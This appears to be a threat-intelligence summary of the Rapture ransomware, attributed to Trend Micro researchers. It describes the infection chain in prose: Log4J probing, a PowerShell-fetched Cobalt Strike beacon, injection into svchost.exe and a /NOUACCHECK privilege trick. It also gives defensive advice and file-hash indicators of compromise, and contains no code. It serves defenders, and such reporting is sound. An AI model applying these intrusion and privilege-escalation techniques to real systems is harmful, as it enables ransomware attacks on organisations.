Rapture Ransomware Dissection

Researchers have uncovered a new ransomware variant, dubbed Rapture, that employs a minimalistic approach and leaves a minimal footprint.

Rapture shares similarities with the Paradise ransomware, such as the RSA key configuration file and the requirement of a .NET 4.0 framework for execution. Rapture differs in the way that it was found to be injected into legitimate processes, and in some instances, the attackers dropped it as a *.log file. Rapture appends six characters to encrypted files and requires specific command lines for proper execution.

The ransom note dropped by Rapture bears a resemblance to the Zeppelin ransomware, although no other connections between the two have been identified.

The infection chain starts with the attackers inspecting firewall policies, checking the PowerShell version, and searching for vulnerable Log4J applets. They then download and execute a PowerShell script to install a Cobalt Strike beacon in the target’s system.

The attackers gain access to the victim’s network, using vulnerable public-facing websites and servers. They then employ a unique method of obtaining higher privileges to execute the payload by injecting malicious activity into an existing svchost.exe process. This process then executes explorer.exe using the /NOUACCHECK command, which allows explorer.exe to drop and execute the second-stage Cobalt Strike beacon downloader.

The second-stage downloader connects to an address to download the main Cobalt Strike beacon. The beacon then attempts to connect to another subfolder on the same C2 server to receive the backdoor command and other payloads. The response from the C&C server is sandwiched in another JavaScript code, which the beacon decodes.

The researchers found that the beacon performed ransomware activities in the majority of the affected systems, indicating that the code is downloaded and executed in memory. The investigation of the Cobalt Strike beacon’s watermark revealed that it is likely that Rapture’s operators are using a pirated Windows license, which is also being used by several other threat actors

Recommendation

Organisations can adopt a multifaceted approach to secure potential entry points into their systems, such as endpoints, emails, webs, and networks. By using security solutions that can detect malicious elements and questionable activities, enterprises can protect themselves from ransomware attacks.

This research was documented by researchers from Trend Micro

Indicators of Compromise

• c417a89cdc86ea6d674d2dc629ae1872b4054ac43e948e8ed60d3f3f47178598
• a6cd727a18e5e2a80fbd8a51c299a2030bd5e68e4bbf136e07eb9d0b3f3bb8ce
• 619614cda94a4b6b185c0c122d11ef2b8b0b3e7fc94a1a5c2ff1ac49233df54b
• 4222681314f5ffd69fe17ab2ae4b9aaa60866571fe2b53afc10f87e3738cedda
• b44b4e162de1decc9a5d3c61a045eb4776c55fccd33c9eced5b9f622faee19fa
• 367e13f234a46822aa9655690f18000319123ad07a62e56bcf8bebbfbb0de7b9
• 99331170be7aa48d572728f68e52ac8d3eb3c8307cb8050ce504ef9f4624a4ba
• d793aaaba1b4b34a20432b86505b851d838def0cd722b8cbdd1d08e19a08b6ee